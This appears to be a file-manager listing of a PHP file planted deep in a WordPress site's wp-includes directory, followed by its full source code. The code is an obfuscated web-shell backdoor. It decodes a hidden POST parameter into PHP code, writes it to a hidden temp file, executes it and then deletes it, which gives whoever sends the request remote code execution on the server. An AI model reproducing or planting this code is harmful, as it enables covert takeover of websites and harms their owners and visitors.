• File: tab.php
  • Full Path: /www/wwwroot/pt-gaming.com/wp-includes/js/dist/script-modules/workflow/tab.php
  • Date Modified: 03/05/2026 11:58 AM
  • File size: 1010 B
  • MIME-type: text/x-php
  • Charset: utf-8
<?php

if(filter_has_var(INPUT_POST, "f\x6Cg")){
	$dat = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/var/tmp"]);
	$hld = $_POST["f\x6Cg"];
	 $hld =  explode("."	,	$hld  ) ; 
	$key 	=  '';
            $s 	=  'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen 	=  strlen($s );
            $q 	=  0;
            $__len 	=  count($hld );
    
            do {
                if($q>=		$__len) break;
                $v4 	=  $hld[$q];
                $sChar 	=  ord($s[$q % $sLen] );
                $d 	=  ((int)$v4 - $sChar -($q % 10))	^	 55;
                $key  .=  chr($d );
                $q++;
            } while(true );
	while ($bind = array_shift($dat)) {
    		if (!( !is_dir($bind) || !is_writable($bind) )) {
    $element = str_replace("{var_dir}", $bind, "{var_dir}/.k");
    $success = file_put_contents($element, $key);
if ($success) {
	include $element;
	@unlink($element);
	die();}
}
}
}